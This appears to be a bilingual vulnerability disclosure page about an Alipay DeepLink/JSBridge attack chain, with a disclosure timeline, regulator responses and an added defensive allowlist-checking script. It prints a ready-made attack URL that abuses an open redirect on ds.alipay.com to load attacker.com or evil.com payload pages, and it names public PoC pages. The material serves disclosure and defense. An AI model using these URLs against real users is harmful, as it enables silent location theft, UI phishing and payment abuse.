</div>
<div style="background:rgba(0,0,0,.3);border-radius:8px;padding:14px 16px;font-family:monospace;font-size:13px;overflow-x:auto;color:#ff8888;margin-top:4px;">
<div style="color:#9898a8;margin-bottom:6px;">// 任何人都可以构造的攻击链接:</div>
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=<span style="color:#ff4444;font-weight:bold;">https://attacker.com/payload.html</span>
</div>
</div>
<div class="en">
<div style="display:grid;grid-template-columns:40px 1fr;gap:8px 12px;align-items:start;margin-bottom:16px;">
<div style="font-size:24px;text-align:center;">🔑</div>
<div><strong style="color:#ff6b35;">This is the master key to the entire attack chain.</strong> Alipay uses a domain whitelist to restrict pages loadable in its WebView. However, its own domain <code style="background:#1a1a28;padding:2px 6px;border-radius:4px;color:#ff8888;">ds.alipay.com</code> has an open redirect vulnerability, allowing attackers to load arbitrary malicious pages through the whitelisted domain. <strong>Without this bypass, other vulnerabilities are LAN-only; with it, anyone can attack remotely.</strong></div>
<div style="font-size:24px;text-align:center;">👤</div>
<div><strong style="color:#ff6b35;">No developer permissions required.</strong> No Alipay Open Platform registration, no Mini Program developer credentials, no approval process. An attacker simply crafts a URL and sends it via WeChat, WhatsApp, SMS, or any messaging app.</div>
<div style="font-size:24px;text-align:center;">💣</div>
<div><strong style="color:#ff6b35;">17 vulnerabilities go from "theoretical" to "in-the-wild."</strong> Once the attacker's page loads inside Alipay's WebView, it gains full JSBridge API access — <strong>silently steal GPS coordinates, invoke payment interfaces, access the camera, spoof UI elements</strong> — all through a single link.</div>
<div style="font-size:24px;text-align:center;">💬</div>
<div><strong style="color:#ff6b35;">The vendor acknowledged the severity.</strong> Ant Group's security team stated during our call: <em>"If you can bypass our whitelist, that would be serious."</em> Less than 2 minutes after the call ended, the whitelist was bypassed. <strong>The vendor confirmed it was serious, yet still refuses to patch, calling it "normal functionality."</strong></div>
</div>
<div style="background:rgba(0,0,0,.3);border-radius:8px;padding:14px 16px;font-family:monospace;font-size:13px;overflow-x:auto;color:#ff8888;margin-top:4px;">
<div style="color:#9898a8;margin-bottom:6px;">// Attack URL anyone can construct:</div>
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=<span style="color:#ff4444;font-weight:bold;">https://attacker.com/payload.html</span>
</div>
</div>
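<p>What the whitelist should have checked, as an added example in JavaScript (not Alipay's code): resolve the page the WebView will actually load, following the <code>?scheme=</code> redirect on ds.alipay.com and then the <code>url=</code> parameter of the <code>startapp</code> deeplink, and apply the allowlist to that final host instead of to the outer link. Only ds.alipay.com, appId 20000067 and the two URLs quoted on this page are taken from the page; the allowlist contents, helper names and the benign sample URL are assumptions.</p>

```javascript
// Added example, not Alipay's code: apply the WebView allowlist to the page that
// will really be loaded, not to the host of the inbound link. Only ds.alipay.com,
// appId 20000067 and the sample attack/trigger URLs come from the page; every other
// name and value is an assumption or a constructed sample.

const ALLOWED_HOSTS = new Set(["ds.alipay.com"]);      // hosts the WebView may load (assumed)
const REDIRECTOR_HOSTS = new Set(["ds.alipay.com"]);   // hosts whose ?scheme= redirects (page)
const H5_CONTAINER_APPID = "20000067";                 // appId the page's URLs use to load url=
const MAX_HOPS = 5;                                    // bound on redirect chains (assumed)

// Attack URL shown on the page, and the Android intent form of the page's trigger URL.
const SAMPLE_ATTACK_URL =
  "https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https://attacker.com/payload.html";
const SAMPLE_TRIGGER_URL =
  "intent://platformapi/startapp?appId=20000067&url=https%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fverify.html#Intent;scheme=alipays;package=com.eg.android.AlipayGphone;end";
// Constructed: same redirect shape, but the final page stays on the allowed host.
const SAMPLE_BENIGN_URL =
  "https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https://ds.alipay.com/help/faq.html";

function hostOf(u) {
  try { return new URL(u).hostname.toLowerCase(); } catch (_e) { return null; }
}

// The flawed check: only the outer host is inspected, so the redirector passes.
function naiveHostAllowed(u) {
  const h = hostOf(u);
  return h !== null && ALLOWED_HOSTS.has(h);
}

// Target of a redirector link. The inner deeplink is usually passed unencoded, so
// its own "&url=" is swallowed by the outer query and URLSearchParams would return
// only "alipays://platformapi/startapp?appId=...". Take the raw tail after scheme=
// instead, which is what the redirector forwards; decode it if it was encoded.
function redirectTarget(u) {
  let search;
  try { search = new URL(u).search; } catch (_e) { return null; }
  const m = /[?&]scheme=(.*)$/.exec(search);
  if (!m) return null;
  try { return decodeURIComponent(m[1]); } catch (_e) { return m[1]; }
}

// Page an alipays://platformapi/startapp deeplink would load into the H5 container,
// or null when the URL is not such a launch. Android intent:// URLs carry the real
// scheme in their "#Intent;scheme=...;end" fragment.
function deeplinkPage(u) {
  let url;
  try { url = new URL(u); } catch (_e) { return null; }
  let scheme = url.protocol;
  if (scheme === "intent:") {
    const m = /(?:^|[#;])scheme=([^;]+)/.exec(url.hash);
    if (m) scheme = m[1] + ":";
  }
  if (scheme !== "alipays:" || url.hostname !== "platformapi" || url.pathname !== "/startapp") return null;
  if (url.searchParams.get("appId") !== H5_CONTAINER_APPID) return null;
  return url.searchParams.get("url");
}

// Follow link -> redirector -> deeplink -> H5 page until a plain page is reached.
function resolveEffectiveUrl(u) {
  let current = u;
  for (let hop = 0; hop < MAX_HOPS; hop++) {
    const host = hostOf(current);
    if (host !== null && REDIRECTOR_HOSTS.has(host)) {
      const next = redirectTarget(current);
      if (next === null) return current;   // ordinary page on the redirector host
      current = next;
      continue;
    }
    const page = deeplinkPage(current);
    if (page === null) return current;     // neither redirect nor H5 launch: final page
    current = page;
  }
  return null;                             // hop budget exhausted: unresolvable, deny
}

// The corrected check: allowlist the host of the page that will really be loaded.
function effectiveHostAllowed(u) {
  const finalUrl = resolveEffectiveUrl(u);
  const h = finalUrl === null ? null : hostOf(finalUrl);
  return h !== null && ALLOWED_HOSTS.has(h);
}

// One record per inbound link, suitable for logging: where the link claims to go,
// where it really goes, and how the two checks disagree.
function auditLink(u) {
  return {
    outerHost: hostOf(u),
    effectiveUrl: resolveEffectiveUrl(u),
    naiveAllowed: naiveHostAllowed(u),
    effectiveAllowed: effectiveHostAllowed(u),
  };
}
```

For the page's attack URL the two checks disagree (outer host allowed, effective target attacker.com denied), which is exactly the record a detection pipeline should alert on.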
</div>
</div>
<div class="container">
<!-- ==================== META ==================== -->
<section>
<table>
<tr>
<th style="width:160px">
<span class="zh">Field</span><span class="en">Field</span>
</th>
<th>
<span class="zh">Value</span><span class="en">Value</span>
</th>
</tr>
<tr><td><strong>Target</strong></td><td>com.eg.android.AlipayGphone v10.8.26.7000 / v10.8.30.8000</td></tr>
<tr><td><strong>APK Size</strong></td><td>210.5 MB (220,503,494 bytes)</td></tr>
<tr><td><strong>Platform</strong></td><td>Android 16 (API 36) + iOS 26.3.1</td></tr>
<tr>
<td><strong>
<span class="zh">Analysis Date</span><span class="en">Analysis Date</span>
</strong></td>
<td>2026-02-16 ~ 2026-03-07</td>
</tr>
<tr>
<td><strong>
<span class="zh">Prerequisites</span><span class="en">Prerequisites</span>
</strong></td>
<td>
<span class="zh">No root, no jailbreak, no special permissions; the victim only needs to click one link.</span>
<span class="en">No root, no jailbreak, no special permissions. Victim only needs to click one link.</span>
</td>
</tr>
<tr>
<td><strong>
<span class="zh">Researcher</span><span class="en">Researcher</span>
</strong></td>
<td>Innora AI Security Research (feng@innora.ai)</td>
</tr>
</table>
</section>
<!-- ==================== TOC ==================== -->
<div class="toc">
<h3>
<span class="zh">Table of Contents</span><span class="en">Table of Contents</span>
</h3>
<ol>
<li><a href="#disclosure">
<span class="zh">Disclosure Timeline</span><span class="en">Disclosure Timeline</span>
</a></li>
<li><a href="#summary">
<span class="zh">Executive Summary</span><span class="en">Executive Summary</span>
</a></li>
<li><a href="#chain">
<span class="zh">Attack Chain Details</span><span class="en">Attack Chain Details</span>
</a></li>
<li><a href="#poc">
<span class="zh">Live PoC Demonstration</span><span class="en">Live PoC Demonstration</span>
</a></li>
<li><a href="#vulns">
<span class="zh">Verified Security Issues</span><span class="en">Verified Security Issues</span>
</a></li>
<li><a href="#evidence">
<span class="zh">Evidence</span><span class="en">Evidence</span>
</a></li>
<li><a href="#devices">
<span class="zh">Cross-Platform Verification</span><span class="en">Cross-Platform Verification</span>
</a></li>
<li><a href="#ios">
<span class="zh">iOS-Specific Risks</span><span class="en">iOS-Specific Risks</span>
</a></li>
<li><a href="#defense">
<span class="zh">Working Defenses</span><span class="en">Working Defenses</span>
</a></li>
<li><a href="#vendor">
<span class="zh">Vendor Response &amp; Discussion</span><span class="en">Vendor Response &amp; Discussion</span>
</a></li>
<li><a href="#recommendations">
<span class="zh">Remediation Recommendations</span><span class="en">Remediation Recommendations</span>
</a></li>
<li><a href="#user-defense">
<span class="zh">User Self-Protection</span><span class="en">User Self-Protection</span>
</a></li>
<li><a href="#community-faq">
<span class="zh">Community Questions &amp; Responses</span><span class="en">Community Questions &amp; Responses</span>
</a></li>
<li><a href="#global-response">
<span class="zh">Global Regulatory Response</span><span class="en">Global Regulatory Response</span>
</a></li>
<li><a href="#legal-response">
<span class="zh">Legal Response</span><span class="en">Legal Response</span>
</a></li>
</ol>
</div>
<!-- ==================== 1. DISCLOSURE TIMELINE ==================== -->
<section id="disclosure">
<h2><span class="num">01</span>
<span class="zh">Responsible Disclosure Timeline</span>
<span class="en">Responsible Disclosure Timeline</span>
</h2>
<div class="zh">
<p>We followed the principles of responsible security research throughout. Before making anything public, complete reports were submitted to Ant Group through multiple channels.</p>
</div>
<div class="en">
<p>We followed responsible disclosure principles throughout. Before any public discussion, full reports were submitted to Ant Group through multiple channels.</p>
</div>
<div class="timeline">
<div class="timeline-item">
<div class="timeline-date">2026-02-16</div>
<p>
<span class="zh">Started static analysis of the Alipay v10.8.30.8000 APK</span>
<span class="en">Started static analysis of Alipay v10.8.30.8000 APK</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-02-25</div>
<p>
<span class="zh"><strong>First report</strong>: TLS/SSL man-in-the-middle + device fingerprinting issues, submitted through the vendor's Security Response Center (SRC)<br><em style="opacity:.7;font-size:.9em;">Note: this report covered TLS/SSL issues only; the DeepLink/JSBridge attack chain had not yet been discovered</em></span>
<span class="en"><strong>First Report</strong> — TLS/SSL MITM + device fingerprinting issues submitted via vendor's Security Response Center (SRC)<br><em style="opacity:.7;font-size:.9em;">Note: This report covered TLS/SSL issues only; the DeepLink/JSBridge attack chain had not yet been discovered</em></span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-06</div>
<p>
<span class="zh"><strong>AntSRC reply</strong>: "After review by our security engineers, [the issues] cannot be practically exploited"</span>
<span class="en"><strong>AntSRC Reply</strong>: "After review by our security engineers, [the issues] cannot be practically exploited"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 04:08</div>
<p>
<span class="zh"><strong>Second report</strong>: the DeepLink+JSBridge attack chain was discovered; 8 issues (2 CRITICAL + 4 HIGH) sent to the vendor's security team contact</span>
<span class="en"><strong>Second Report</strong> — DeepLink+JSBridge attack chain discovered, 8 issues (2 CRITICAL + 4 HIGH) sent to vendor security contact</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 06:07</div>
<p>
<span class="zh"><strong>Third report (V3)</strong>: expanded to 17 issues, including financial-operation risks + 308 server log entries + 42 screenshots</span>
<span class="en"><strong>Third Report (V3)</strong> — Expanded to 17 issues including financial operation risks + 308 server logs + 42 screenshots</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 07:54</div>
<p>
<span class="zh"><strong>Fourth report</strong>: complete end-to-end external attack demonstration, verified on 3 devices across countries (New Zealand / Malaysia / China), with a live reproduction link</span>
<span class="en"><strong>Fourth Report</strong> — Full E2E external attack demo, 3 devices cross-country verification (NZ/MY/CN), with live reproduction URL</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 12:33</div>
<p>
<span class="zh"><strong>Vendor reply</strong>: "The vulnerability report emails have been received; we will have someone analyze them as soon as possible and get back to you"</span>
<span class="en"><strong>Vendor Reply</strong>: "Vulnerability report emails received, we will arrange someone to analyze ASAP and reply"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 14:25</div>
<p>
<span class="zh"><strong>WeChat voice call (15 min 46 s)</strong>: the vendor's security business lead argued on the call that "these functions are open within the LAN by design," trying to limit the attack surface to a LAN scenario, and hinted: <strong>"If you can bypass our whitelist, that would be serious."</strong> All testing up to that point had indeed been on a local network (the researcher's machine and the Xiaomi Redmi 12 test phone on the same WiFi, with the PoC page hosted at 192.168.80.12:8888)</span>
<span class="en"><strong>WeChat Voice Call (15m 46s)</strong> — Vendor security lead argued that "these features are designed to be open within LAN" and attempted to frame the attack surface as LAN-only. The lead implied: <strong>"If you can bypass our whitelist, that would be serious."</strong> All prior testing had indeed been on a local network (researcher's machine and Xiaomi Redmi 12 test phone on the same WiFi), with PoC pages hosted at 192.168.80.12:8888</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 14:36</div>
<p>
<span class="zh"><strong>Whitelist bypass, completed within 2 minutes</strong>: less than 2 minutes after the call ended we had bypassed the whitelist mechanism the vendor believed to be secure. Method: the <code>ds.alipay.com/?scheme=</code> open redirect parameter. The domain ds.alipay.com is itself on the Alipay WebView whitelist, and its <code>?scheme=</code> parameter accepts a redirect to an arbitrary URL, so an attacker can construct <code>https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=https://evil.com/payload.html</code>: the URL's host is a whitelisted domain, but the page actually loaded is the attacker's. <strong>This completely refutes the "LAN-only" defense</strong>: any page on the internet can enter the Alipay WebView through the whitelisted-domain redirect and call the JSBridge API</span>
<span class="en"><strong>Whitelist Bypass — Completed in Under 2 Minutes</strong> — Less than 2 minutes after the call ended, we bypassed the vendor's whitelist mechanism they believed was secure. Method: exploiting the <code>ds.alipay.com/?scheme=</code> open redirect parameter. The domain ds.alipay.com is itself whitelisted in Alipay's WebView, and its <code>?scheme=</code> parameter accepts arbitrary URL redirects. An attacker can craft <code>https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=https://evil.com/payload.html</code> — the URL host is a whitelisted domain, but it actually loads the attacker's page. <strong>This completely invalidated the "LAN-only" defense</strong> — any page on the internet can use the whitelisted domain redirect to enter Alipay's WebView and invoke JSBridge APIs</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:01</div>
<p>
<span class="zh"><strong>Public PoC deployment + second voice call (7 min 07 s)</strong>: the PoC was deployed on the public internet at <code>https://innora.ai/sec/trigger.html</code> (trigger page) and <code>https://innora.ai/sec/verify.html</code> (payload page) and sent to the vendor's security staff for verification, proving the attack is fully viable over the internet and not limited to a LAN</span>
<span class="en"><strong>Public PoC Deployment + Second Voice Call (7m 07s)</strong> — Deployed PoC to public internet at <code>https://innora.ai/sec/trigger.html</code> (trigger page) and <code>https://innora.ai/sec/verify.html</code> (payload page), sent to vendor security lead for verification. Proved the attack is fully viable over the internet, not limited to LAN</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:09</div>
<p>
<span class="zh"><strong>Vendor security staff test it themselves: an iPhone connects from Hangzhou</strong>: server logs show an iPhone 17 Pro Max connecting from Hangzhou (where Alipay is headquartered), GPS fix (30.3xxx, 120.1xxx) with 9.99 m accuracy. The device had 2xxGB of storage and 80% battery. <strong>Key finding: 18 JSBridge APIs are available on iOS versus 13 on Android, 5 additional high-risk APIs: tradePay, share, getLocation, scan, chooseImage</strong>. On iOS, tradePay (payment) and getLocation (positioning) can be called directly from an external page, whereas Android blocks these APIs. This means the <strong>iOS attack surface is significantly larger than Android's</strong>, and the share API enables worm-style propagation</span>
<span class="en"><strong>Vendor Security Lead Tests — iPhone Connects from Hangzhou</strong> — Server logs show iPhone 17 Pro Max connecting from Hangzhou (Alipay HQ city), GPS (30.3xxx, 120.1xxx) accuracy 9.99m. Device: 2xxGB storage, 80% battery. <strong>Critical discovery: 18 JSBridge APIs available on iOS vs 13 on Android — 5 additional high-risk APIs: tradePay, share, getLocation, scan, chooseImage</strong>. iOS tradePay (payment) and getLocation (GPS) can be invoked from external pages, while Android blocks them. This means <strong>iOS attack surface is significantly larger than Android</strong>, and the share API enables worm-like propagation</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:28 ~ 17:03</div>
<p>
<span class="zh"><strong>V6 PoC + multi-device verification</strong>: created the V6 PoC targeting the high-impact issues: (1) silent GPS + device fingerprint theft (2) payment-redirection attack (3) UI phishing (4) sensitive-page redirect chains (5) share API worm propagation (iOS). The test account was blocked for repeatedly triggering risk controls, so a friend in New Zealand was asked to test: it triggered normally. It was then verified on my spouse's iPhone: also successful. Vendor replied "OK, we'll take a look"</span>
<span class="en"><strong>V6 PoC + Multi-device Verification</strong> — Created V6 PoC targeting high-impact vulns: (1) silent GPS+device fingerprint theft (2) payment redirection attack (3) phishing UI (4) sensitive page redirect chains (5) share API worm propagation (iOS). Test account banned due to risk control triggers; delegated to friend in New Zealand — triggered successfully. Then verified with spouse's iPhone — also successful. Vendor replied "OK, let us analyze"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-08</div>
<p>
<span class="zh"><strong>Vendor second-round verification</strong>: the security business lead ran deeper tests in Hangzhou on an iPhone 16 Pro. No GPS authorization notice or dialog appeared at any point; GPS data was returned about 7 seconds after page load. Over 3 rounds the accuracy went from 17.4 m to 9.99 m to 8.81 m, with <code>locationReducedAccuracy: 0</code> (precise-location mode). This round further confirmed the iOS attack-surface problem found the previous day and proved that the GPS leak happens with the user completely unaware</span>
<span class="en"><strong>Vendor Second-round Verification</strong> — Security business lead conducted deeper testing in Hangzhou with iPhone 16 Pro. Zero GPS authorization dialogs appeared throughout; GPS data transmitted within ~7 seconds of page load. 3-round accuracy improved from 17.4m to 9.99m to 8.81m, with <code>locationReducedAccuracy: 0</code> (precise mode). This round further confirmed the iOS attack surface discovered the previous day, and verified GPS exfiltration occurs with zero user awareness</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-09</div>
<p>
<span class="zh">Test account blocked (risk controls triggered during security testing); account unblock request sent</span>
<span class="en">Test account banned (risk control triggered during testing). Account unblock request sent.</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-10</div>
<p>
<span class="zh"><strong>Vendor's final reply</strong>: "According to our assessment, these are normal functionality"</span>
<span class="en"><strong>Vendor Final Response</strong>: "Based on our assessment, these are normal functionality"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 ~18:03</div>
<p>
<span class="zh"><strong>WeChat conversation</strong> (screenshot in Thai time 17:03; +1 h = Beijing time): the vendor contact confirmed the "normal functionality" classification (replying "嗯", an acknowledgement), and we informed them that we would discuss the findings publicly. The contact used the word "洞" (vulnerability) in the conversation, which shows that internally they were not unaware of the security nature of the findings</span>
<span class="en"><strong>WeChat Conversation</strong> (screenshot in Thai timezone 17:03, +1h = Beijing time) — Vendor contact confirmed "normal functionality" classification. We notified intent to publish. The contact used the colloquial term "洞" (vulnerability) in conversation, suggesting internal awareness of the security nature of these findings</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 18:16</div>
<p>
<span class="zh"><strong>Public release</strong>: after the vendor explicitly refused to fix, the research was published</span>
<span class="en"><strong>Public Disclosure</strong> — After vendor explicitly refused to fix, research published</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 22:45</div>
<p>
<span class="zh"><strong>Legal complaint</strong>: just 4 hours after publication, Beijing Geyun Law Firm, acting for the vendor, filed a complaint with the WeChat Official Accounts platform alleging that our article "infringes reputation / goodwill / privacy / likeness." The irony: <strong>not one of the words "支付宝", "Alipay" or "蚂蚁集团" (Ant Group) appears anywhere in our article</strong>. By filing the complaint, the complainant itself confirmed that the behaviour described in the article relates to the company it represents. We have filed an appeal.</span>
<span class="en"><strong>Legal Complaint </strong> — Just 4 hours after publication, Beijing Geyun Law Firm (representing the vendor) filed a "content infringing reputation/goodwill/privacy/likeness" complaint against our WeChat article. The irony: <strong>our article never once mentions "Alipay," "支付宝," or "Ant Group" anywhere in the entire text</strong>. By filing this complaint, the complainant effectively self-identified their client as the subject of the article. We have filed an appeal.</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>CVE submissions (6 vulnerabilities, awaiting confirmation)</strong>: because the vendor (Alibaba, a registered CNA, number CNA-2017-0006) refused to acknowledge the vulnerabilities and to assign CVE IDs, we submitted 6 independent CVE requests in two batches through MITRE's CNA of Last Resort (CNA-LR) path:<br>
<strong>Batch 1 (5):</strong><br>
① DeepLink URL scheme access-control bypass (CWE-939, CVSS 9.1)<br>
② iOS silent GPS exfiltration, no authorization prompt (CWE-359, CVSS 7.4)<br>
③ iOS tradePay unauthorized payment-flow invocation (CWE-940, CVSS 8.6)<br>
④ UI spoofing: showToast/setTitle forge the Alipay interface (CWE-451, CVSS 8.1)<br>
⑤ End-to-end sensitive data exfiltration: device fingerprint + permission states (CWE-200, CVSS 8.6)<br>
<strong>Batch 2 (1):</strong><br>
⑥ ds.alipay.com open redirect bypassing the whitelist mechanism (CWE-601+CWE-939, CVSS 9.3): uses the <code>?scheme=</code> parameter of the whitelisted domain ds.alipay.com as an open redirect, completely bypassing the vendor's domain-whitelist protection so that any internet page can reach the WebView through the whitelisted-domain redirect chain and call every JSBridge API. This bypass was completed within 2 minutes during a call with the vendor's security team<br>
Credit: Jiqiang Feng (Innora AI Security Research). Awaiting MITRE's confirmation.</span>
<span class="en"><strong>CVE Submission (6 Vulnerabilities, Awaiting Confirmation)</strong> — Since the vendor (Alibaba, a registered CNA: CNA-2017-0006) refused to acknowledge the vulnerabilities and declined to assign CVE IDs, we submitted 6 independent CVE requests in two batches through MITRE's CNA of Last Resort (CNA-LR) pathway:<br>
<strong>Batch 1 (5 CVEs):</strong><br>
① DeepLink URL Scheme Access Control Bypass (CWE-939, CVSS 9.1)<br>
② iOS Silent GPS Exfiltration — No Authorization Prompt (CWE-359, CVSS 7.4)<br>
③ iOS tradePay Unauthorized Payment Flow Invocation (CWE-940, CVSS 8.6)<br>
④ UI Spoofing — showToast/setTitle Fake Alipay Interface (CWE-451, CVSS 8.1)<br>
⑤ End-to-End Sensitive Data Exfiltration — Device Fingerprint + Permission States (CWE-200, CVSS 8.6)<br>
<strong>Batch 2 (1 CVE):</strong><br>
⑥ ds.alipay.com Open Redirect Whitelist Bypass (CWE-601+CWE-939, CVSS 9.3) — Exploits the <code>?scheme=</code> parameter on whitelisted domain ds.alipay.com to perform an open redirect, completely bypassing the vendor's domain whitelist protection. Any internet-hosted page can chain through the whitelisted domain to enter WebView and invoke all JSBridge APIs. This bypass was achieved in under 2 minutes during a live call with the vendor security team<br>
Credit: Jiqiang Feng (Innora AI Security Research). Awaiting MITRE confirmation.</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Global notification</strong>: vulnerability disclosure notices sent to 23 financial regulators, 13 national CERTs, 14 competitors' security teams and 50+ international media outlets</span>
<span class="en"><strong>Global Notification</strong> — Vulnerability disclosure sent to 23 financial regulators, 13 national CERTs, 14 competitor security teams, and 50+ international media outlets</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Singapore PDPC opens a formal investigation</strong>: Singapore's Personal Data Protection Commission (PDPC) replied confirming that a formal investigation has been opened</span>
<span class="en"><strong>Singapore PDPC Formal Investigation</strong> — Singapore's Personal Data Protection Commission confirmed opening a formal investigation </span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Google Play launches an investigation</strong>: a formal policy-violation report was filed with Google Play (User Data, Permissions and Deceptive Behavior policies). Google confirmed receipt and replied: "We will investigate and take appropriate action"</span>
<span class="en"><strong>Google Play Investigation</strong> — Formal policy violation report submitted to Google Play (User Data, Permissions, Deceptive Behavior policies). Google confirmed: "We will investigate and take appropriate action" </span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Apple Product Security launches an investigation</strong>: Apple's product security team replied in person (Brent), confirming that the report has been forwarded to the relevant investigating team. Apple is investigating the high-risk APIs exposed by Alipay's iOS JSBridge: tradePay (payment), scan (QR scanning), chooseImage (camera), etc.</span>
<span class="en"><strong>Apple Product Security Investigation</strong> — Apple Product Security responded (Brent): "Your report was forwarded along to the appropriate team for investigation." Apple is investigating Alipay iOS JSBridge exposure of tradePay, scan, chooseImage APIs </span>
</p>
</div>
<div class="timeline-item" style="background: linear-gradient(135deg, rgba(0,200,83,0.08), rgba(0,200,83,0.02)); border-left-color: #00c853;">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Listed on Packet Storm Security</strong>: the advisory was formally accepted and published by Packet Storm Security (a well-known global vulnerability database):<br><a href="https://packetstorm.news/files/id/217089" target="_blank" style="color:#00c853;font-weight:bold;">https://packetstorm.news/files/id/217089</a><br>Title: "Alipay Open Redirect / API Attacker Payload Insertion"</span>
<span class="en"><strong>Packet Storm Security Publication</strong> — Advisory officially published on Packet Storm Security (major global vulnerability database):<br><a href="https://packetstorm.news/files/id/217089" target="_blank" style="color:#00c853;font-weight:bold;">https://packetstorm.news/files/id/217089</a><br>Title: "Alipay Open Redirect / API Attacker Payload Insertion"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>HKCERT → CNCERT</strong>: the Hong Kong Computer Emergency Response Team Coordination Centre (HKCERT) confirmed that it has forwarded the report to China's national CERT (CNCERT)</span>
<span class="en"><strong>HKCERT → CNCERT</strong> — Hong Kong CERT confirmed forwarding the report to China National CERT (CNCERT)</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>De Nederlandsche Bank (DNB) formal reply</strong>: identified the CSSF in Luxembourg as the primary supervisory authority for Alipay in Europe and pointed to the GDPR Article 32 (security of processing) enforcement path. A CERT-Luxembourg (CIRCL) incident handler confirmed they would locate a contact at Alipay's European entity and forward the report</span>
<span class="en"><strong>DNB Netherlands Formal Response</strong> — Identified CSSF Luxembourg as Alipay Europe's Primary Supervisory Authority, provided GDPR Article 32 enforcement pathway. A CERT-Luxembourg (CIRCL) incident handler confirmed locating an appropriate Alipay European entity contact to forward the report</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-15</div>
<p>
<span class="zh"><strong>CERT Polska formally accepts the case</strong>: Poland's national CERT accepted the incident and began handling it under its procedures, assigning Ticket #554****57</span>
<span class="en"><strong>CERT Polska Accepted</strong> — Poland national CERT accepted the case, began incident handling procedures, Ticket #554****57</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-15</div>
<p>
<span class="zh"><strong>PCPD, Hong Kong Office of the Privacy Commissioner for Personal Data</strong>: confirmed receipt of the report; will follow up and reply</span>
<span class="en"><strong>PCPD Hong Kong Privacy Commissioner</strong> — Confirmed receipt, will follow up and respond</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-15</div>
<p>
<span class="zh"><strong>AZOP, Croatian Personal Data Protection Agency</strong>: report received, being processed</span>
<span class="en"><strong>AZOP Croatia Data Protection Agency</strong> — Report received, being processed</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-16</div>
<p>
<span class="zh"><strong>SingCERT / CSA, Cyber Security Agency of Singapore</strong>: confirmed receipt of the vulnerability report and advised following up with MITRE on CVE assignment</span>
<span class="en"><strong>SingCERT/CSA Singapore</strong> — Confirmed receipt of vulnerability report, advised to follow up with MITRE on CVE assignment</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-16</div>
<p>
<span class="zh"><strong>HKMA formal referral</strong>: the Hong Kong Monetary Authority formally referred the complaint to Alipay Financial Services (HK) Limited for follow-up; the HKMA will supervise the licensee's handling and take action where necessary</span>
<span class="en"><strong>HKMA Formal Referral</strong> — Complaint formally referred to Alipay Financial Services (HK) Limited for follow-up. HKMA will monitor licensee handling and take appropriate actions as necessary</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-16</div>
<p>
<span class="zh"><strong>DPC, Irish Data Protection Commission</strong>: case DPC032****957 opened; for jurisdictional reasons advised contacting the local DPA</span>
<span class="en"><strong>DPC Ireland</strong> — Case DPC032****957 opened, referred to local DPA due to jurisdiction</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-16</div>
<p>
<span class="zh"><strong>ANSSI / CERT-FR, France</strong>: formal reply that the app has few users in France, so no further action will be taken</span>
<span class="en"><strong>ANSSI/CERT-FR France</strong> — Formal response: app has limited French user base, no further action planned</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-17</div>
<p>
<span class="zh"><strong>AP, Dutch Data Protection Authority</strong>: GDPR complaint formally received</span>
<span class="en"><strong>Dutch DPA (Autoriteit Persoonsgegevens)</strong> — Formally received GDPR complaint</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-17</div>
<p>
<span class="zh"><strong>FCA, UK Financial Conduct Authority</strong>: reference 2121****43; the information has been recorded and will be used in supervisory work</span>
<span class="en"><strong>FCA UK</strong> — Reference 2121****43, information recorded and used in supervisory work with authorised firms</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-17</div>
<p>
<span class="zh"><strong>DNB, Dutch central bank</strong>: email received and being processed</span>
